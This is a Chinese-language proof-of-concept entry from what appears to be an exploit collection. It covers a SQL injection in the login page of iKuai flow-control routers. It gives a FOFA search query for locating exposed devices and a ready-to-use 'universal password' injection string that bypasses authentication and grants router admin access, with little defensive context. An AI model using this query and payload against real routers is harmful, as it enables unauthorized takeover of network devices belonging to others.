POC/wpoc/iKuai/iKuai流控路由SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

28 lines
786 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# iKuai 流控路由 SQL注入漏洞
# 一、漏洞简介
iKuai 流控路由 存在SQL注入漏洞可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限。
# 二、影响版本
+ iKuai 流控路由
# 三、资产测绘
+ fofa`title="登录爱快流控路由"`
+ 特征
![1708141838923-2e73c81d-9305-4108-a974-55314dbcd36f.png](./img/YBuf94WmdVDpk4Za/1708141838923-2e73c81d-9305-4108-a974-55314dbcd36f-143487.png)
# 四、漏洞复现
使用万能密码登陆系统
```java
user: "or""=""or""="
pass:
```
![1708141888537-0e90ab4f-9fcc-4f83-9bb5-3b00d2207213.png](./img/YBuf94WmdVDpk4Za/1708141888537-0e90ab4f-9fcc-4f83-9bb5-3b00d2207213-683464.png)
> 更新: 2024-02-29 23:57:11
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kx86t3hwzf40pktl>